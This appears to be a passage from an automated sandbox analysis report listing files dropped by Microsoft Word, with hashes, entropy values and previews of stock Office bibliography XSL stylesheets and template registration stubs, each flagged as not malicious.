                                                                                                                                                                                                                                                                                                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>............<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..........<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select=
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):286
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):3.5502940710609354
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:6:fxnxUXfQICl8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxnyXClNGHmD0wbnKYZAH/lMZqiv
                                                                                                                                                                                                                                                                                                                                                                          MD5:9B8D7EFE8A69E41CDC2439C38FE59FAF
                                                                                                                                                                                                                                                                                                                                                                          SHA1:034D46BEC5E38E20E56DD905E2CA2F25AF947ED1
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:70042F1285C3CD91DDE8D4A424A5948AE8F1551495D8AF4612D59709BEF69DF2
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:E50BB0C68A33D35F04C75F05AD4598834FEC7279140B1BB0847FF39D749591B8F2A0C94DA4897AAF6C33C50C1D583A836B0376015851910A77604F8396C7EF3C
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .i.s.o.6.9.0...x.s.l.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                                                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):270198
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.073814698282113
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:6144:JwprAiaR95vtfb8pDbgWPzDCvCmvQursq7vImej/yQ4SS1apSiQhHDOruvoVeMUX:We
                                                                                                                                                                                                                                                                                                                                                                          MD5:FF0E07EFF1333CDF9FC2523D323DD654
                                                                                                                                                                                                                                                                                                                                                                          SHA1:77A1AE0DD8DBC3FEE65DD6266F31E2A564D088A4
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:3F925E0CC1542F09DE1F99060899EAFB0042BB9682507C907173C392115A44B5
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:B4615F995FAB87661C2DBE46625AA982215D7BDE27CAFAE221DCA76087FE76DA4B4A381943436FCAC1577CB3D260D0050B32B7B93E3EB07912494429F126BB3D
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>..<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..............<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$para
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):288
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):3.523917709458511
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:6:fxnxUXC1l8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxnySvNGHmD0wbnKYZAH/lMZqiv
                                                                                                                                                                                                                                                                                                                                                                          MD5:4A9A2E8DB82C90608C96008A5B6160EF
                                                                                                                                                                                                                                                                                                                                                                          SHA1:A49110814D9546B142C132EBB5B9D8A1EC23E2E6
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:4FA948EEB075DFCB8DCA773A3F994560C69D275690953625731C4743CD5729F7
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:320B9CC860FFBDB0FD2DB7DA7B7B129EEFF3FFB2E4E4820C3FBBFEA64735EB8CFE1F4BB5980302770C0F77FF575825F2D9A8BB59FC80AD4C198789B3D581963B
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .c.h.i.c.a.g.o...x.s.l.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                                                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):296658
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.000002997029767
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:6144:RwprAMk0qvtfL/vF/bkWPz9yv7EOMBPitjASjTQQr7IwR0TnyDkJb78plJwf33iV:M
                                                                                                                                                                                                                                                                                                                                                                          MD5:9AC6DE7B629A4A802A41F93DB2C49747
                                                                                                                                                                                                                                                                                                                                                                          SHA1:3D6E929AA1330C869D83F2BF8EBEBACD197FB367
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:52984BC716569120D57C8E6A360376E9934F00CF31447F5892514DDCCF546293
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:5736F14569E0341AFB5576C94B0A7F87E42499CEC5927AAC83BB5A1F77B279C00AEA86B5F341E4215076D800F085D831F34E4425AD9CFD52C7AE4282864B1E73
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>....<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>............<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$para
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):314
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):3.5230842510951934
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:6:fxnxUXJuJaw93Ti8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxnyZuUw9eNGHmD0wbnKYZAH/lMZqiv
                                                                                                                                                                                                                                                                                                                                                                          MD5:F25AC64EC63FA98D9E37782E2E49D6E6
                                                                                                                                                                                                                                                                                                                                                                          SHA1:97DD9CFA4A22F5B87F2B53EFA37332A9EF218204
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:834046A829D1EA836131B470884905856DBF2C3C136C98ADEEFA0F206F38F8AB
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:A0387239CDE98BCDE1668B582B046619C3B3505F9440343DAD22B1B7B9E05F3B74F2AE29E591EC37B6570A0C0E5FE571442873594B0684DDCCB4F6A1B5E10B1F
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .i.e.e.e.2.0.0.6.o.f.f.i.c.e.o.n.l.i.n.e...x.s.l.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                                                                                                                          File Type:XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):294178
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):4.977758311135714
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:6144:ydkJ3yU0orh0SCLVXyMFsoiOjWIm4vW2uo4hfhf7v3uH4NYYP4BpBaZTTSSamEUD:b
                                                                                                                                                                                                                                                                                                                                                                          MD5:0C9731C90DD24ED5CA6AE283741078D0
                                                                                                                                                                                                                                                                                                                                                                          SHA1:BDD3D7E5B0DE9240805EA53EF2EB784A4A121064
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:ABCE25D1EB3E70742EC278F35E4157EDB1D457A7F9D002AC658AAA6EA4E4DCDF
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:A39E6201D6B34F37C686D9BD144DDD38AE212EDA26E3B81B06F1776891A90D84B65F2ABC5B8F546A7EFF3A62D35E432AF0254E2F5BFE4AA3E0CF9530D25949C0
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>....<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt"......xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">.....<xsl:output method="html" encoding="us-ascii"/>.....<xsl:template match="/">....<xsl:call-template name="Start"/>...</xsl:template>.....<xsl:template name="Start">....<xsl:choose>.....<xsl:when test="b:Version">......<xsl:text>2010.2.02</xsl:text>.....</xsl:when>.......<xsl:when test="b:XslVersion">......<xsl:text>2006</xsl:text>.....</xsl:when>.. <xsl:when test="b:StyleNameLocalized">.. <xsl:choose>.. <xsl:when test="b:StyleNameLocalized/b:Lcid='1033'">.. <xsl:text>IEEE</xsl:text>.. </xsl:when>.. <xsl:when test="b:StyleNameLocalized/b:Lcid='1025'">.. <xsl:text>IEEE</xsl:text>.. </xsl:when>.. <xsl:when test="b:StyleNameL
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                                                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):333258
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):4.654450340871081
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:6144:ybW83Zb181+MKHZR5D7H3hgtfL/8mIDbEhPv9FHSVsioWUyGYmwxAw+GIfnUNv5J:i
                                                                                                                                                                                                                                                                                                                                                                          MD5:5632C4A81D2193986ACD29EADF1A2177
                                                                                                                                                                                                                                                                                                                                                                          SHA1:E8FF4FDFEB0002786FCE1CF8F3D25F8E9631E346
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:06DE709513D7976690B3DD8F5FDF1E59CF456A2DFBA952B97EACC72FE47B238B
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:676CE1957A374E0F36634AA9CFFBCFB1E1BEFE1B31EE876483B10763EA9B2D703F2F3782B642A5D7D0945C5149B572751EBD9ABB47982864834EF61E3427C796
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>....<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">.. <xsl:output method="html" encoding="us-ascii"/>.... <xsl:template match="*" mode="outputHtml2">.. <xsl:apply-templates mode="outputHtml"/>.. </xsl:template>.... <xsl:template name="StringFormatDot">.. <xsl:param name="format" />.. <xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.. <xsl:when test="$format = ''"></xsl:when>.. <xsl:when test="substring($format, 1, 2) = '%%'">.. <xsl:text>%</xsl:text>.. <xsl:call-template name="StringFormatDot">.. <xsl:with-param name="format" select="substring($format, 3)" />.. <xsl:with-param name=
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):328
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):3.541819892045459
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:6:fxnxUXuqRDA5McaQVTi8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxny+AASZQoNGHmD0wbnKYZAH/lMZqiv
                                                                                                                                                                                                                                                                                                                                                                          MD5:C3216C3FC73A4B3FFFE7ED67153AB7B5
                                                                                                                                                                                                                                                                                                                                                                          SHA1:F20E4D33BABE978BE6A6925964C57D6E6EF1A92E
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:7CF1D6A4F0BE5E6184F59BFB1304509F38E480B59A3B091DBDC43B052D2137CB
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:D3B78BE6E7633FF943F5E34063B5EFA4AF239CD49F437227FC7575F6CC65C497B7D6F6A979EA065065BEAF257CB368560B5462542692286052B5C7E5C01755BC
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .A.P.A.S.i.x.t.h.E.d.i.t.i.o.n.O.f.f.i.c.e.O.n.l.i.n.e...x.s.l.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):290
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):3.5161159456784024
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:6:fxnxUX+l8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxnyulNGHmD0wbnKYZAH/lMZqiv
                                                                                                                                                                                                                                                                                                                                                                          MD5:C15EB3F4306EBF75D1E7C3C9382DEECC
                                                                                                                                                                                                                                                                                                                                                                          SHA1:A3F9684794FFD59151A80F97770D4A79F1D030A6
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:23C262DF3AEACB125E88C8FFB7DBF56FD23F66E0D476AFD842A68DDE69658C7F
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:ACDF7D69A815C42223FD6300179A991A379F7166EFAABEE41A3995FB2030CD41D8BCD46B566B56D1DFBAE8557AFA1D9FD55143900A506FA733DE9DA5D73389D6
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .t.u.r.a.b.i.a.n...x.s.l.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                                                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):344303
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.023195898304535
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:6144:UwprANnsqvtfL/vF/bkWPRMMv7EOMBPitjASjTQQr7IwR0TnyDk1b78plJwf33iD:6
                                                                                                                                                                                                                                                                                                                                                                          MD5:F079EC5E2CCB9CD4529673BCDFB90486
                                                                                                                                                                                                                                                                                                                                                                          SHA1:FBA6696E6FA918F52997193168867DD3AEBE1AD6
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:3B651258F4D0EE1BFFC7FB189250DED1B920475D1682370D6685769E3A9346DB
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:4FFFA59863F94B3778F321DA16C43B92A3053E024BDD8C5317077EA1ECC7B09F67ECE3C377DB693F3432BF1E2D947EC5BF8E88E19157ED08632537D8437C87D6
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>......<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>............<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$pa
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):302
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):3.537169234443227
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:6:fxnxUXfQIUA/e/Wl8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxnyXZ/eulNGHmD0wbnKYZAH/lMZqiv
                                                                                                                                                                                                                                                                                                                                                                          MD5:9C00979164E78E3B890E56BE2DF00666
                                                                                                                                                                                                                                                                                                                                                                          SHA1:1FA3C439D214C34168ADF0FBA5184477084A0E51
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:21CCB63A82F1E6ACD6BAB6875ABBB37001721675455C746B17529EE793382C7B
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:54AC8732C2744B60DA744E54D74A2664658E4257A136ABE886FF21585E8322E028D8243579D131EF4E9A0ABDDA70B4540A051C8B8B60D65C3EC0888FD691B9A7
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .i.s.o.6.9.0.n.m.e.r.i.c.a.l...x.s.l.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                                                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):217137
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.068335381017074
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:6144:AwprA3Z95vtf58pb1WP2DCvCmvQursq7vIme5QyQzSS1apSiQhHDlruvoVeMUwFj:4P
                                                                                                                                                                                                                                                                                                                                                                          MD5:3BF8591E1D808BCCAD8EE2B822CC156B
                                                                                                                                                                                                                                                                                                                                                                          SHA1:9CC1E5EFD715BD0EAE5AF983FB349BAC7A6D7BA0
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:7194396E5C833E6C8710A2E5D114E8E24338C64EC9818D51A929D57A5E4A76C8
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:D434A4C15DA3711A5DAAF5F7D0A5E324B4D94A04B3787CA35456BFE423EAC9D11532BB742CDE6E23C16FA9FD203D3636BD198B41C7A51E7D3562D5306D74F757
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>..<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..........<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>...... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$parame
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):252
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):3.4680595384446202
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:6:fxnxUXivlE3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnyydGHmD0+dAH/luWvv
                                                                                                                                                                                                                                                                                                                                                                          MD5:D79B5DE6D93AC06005761D88783B3EE6
                                                                                                                                                                                                                                                                                                                                                                          SHA1:E05BDCE2673B6AA8CBB17A138751EDFA2264DB91
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:96125D6804544B8D4E6AE8638EFD4BD1F96A1BFB9EEF57337FFF40BA9FF4CDD1
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:34057F7B2AB273964CB086D8A7DF09A4E05D244A1A27E7589BDC7E5679AB5F587FAB52A2261DB22070DA11EF016F7386635A2B8E54D83730E77A7B142C2E3929
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .a.r.c.h.i.t.e.c.t.u.r.e...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                                                                                                                          File Type:Microsoft OOXML
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):5783
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.88616857639663
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:96:CDG4D+8VsXzXc2zLXTJ2XFY47pk2G7HVlwFzTXNbMfmn2ivLZcreFWw5fc9ADdZm:CDG4DRGY23l2Xu47GL7YtT9V29yWvWdk
                                                                                                                                                                                                                                                                                                                                                                          MD5:8109B3C170E6C2C114164B8947F88AA1
                                                                                                                                                                                                                                                                                                                                                                          SHA1:FC63956575842219443F4B4C07A8127FBD804C84
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:F320B4BB4E57825AA4A40E5A61C1C0189D808B3EACE072B35C77F38745A4C416
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:F8A8D7A6469CD3E7C31F3335DDCC349AD7A686730E1866F130EE36AA9994C52A01545CE73D60B642FFE0EE49972435D183D8CD041F2BB006A6CAF31BAF4924AC
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
